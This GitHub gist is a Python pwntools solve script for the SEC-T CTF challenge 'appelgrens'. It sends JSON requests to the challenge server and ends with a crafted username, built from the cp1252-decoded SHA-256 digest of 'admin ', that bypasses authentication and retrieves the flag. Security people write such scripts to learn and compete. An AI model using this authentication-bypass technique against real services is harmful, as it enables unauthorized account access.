Skip to content

Instantly share code, notes, and snippets.

@grocid
Created September 20, 2019 14:45
Show Gist options
  • Star 0 You must be signed in to star a gist
  • Fork 0 You must be signed in to fork a gist
  • Save grocid/f177f04a671d104202cfaaea0ed537e6 to your computer and use it in GitHub Desktop.
Save grocid/f177f04a671d104202cfaaea0ed537e6 to your computer and use it in GitHub Desktop.
SEC-T CTF appelgrens
from hashlib import sha256
from pwn import *
s = remote("appelgrens-01.pwn.beer", 31337)
user = "admin "
print [sha256(user).digest().decode("cp1252")]
payload1 = '{"username": "%s", "password": "random stuff", "command": "create"}' % user
badpayload1 = '{"username": "%s", "password": "random stuff", "command": "read"}' % user
badpayload2 = '{"username": "%s", "password": "random stuff", "command": "read", "code": "454"}' % user
payload2 = '{"username": "]Nl\\u00abm\\u2039O\\u00a0_yS\\\\7/\\u0018\\u0012\\u00de\\u00d9\\u00c4\\u00e6\\n\\u00ec\\u2026M\\u2014\\u00bc\\u00d5\\u0006M\\u00fc\\u2030~", "password": "random stuff", "command": "read"}'
s.recv(4096)
print "[ ] sending create payload", payload1
s.send(payload1 + "\n")
print "[ ] sending bad payload", badpayload1
s.send(badpayload1 + "\n")
response = s.recv(4096)
assert("authentication error" in response)
print "[ ] sending bad payload", badpayload2
s.send(badpayload2 + "\n")
response = s.recv(4096)
assert("authentication error" in response)
print "[ ] sending exploit payload", payload2
s.send(payload2 + "\n")
response = s.recv(4096)
print response
assert("SECT{" in response)
Sign up for free to join this conversation on GitHub. Already have an account? Sign in to comment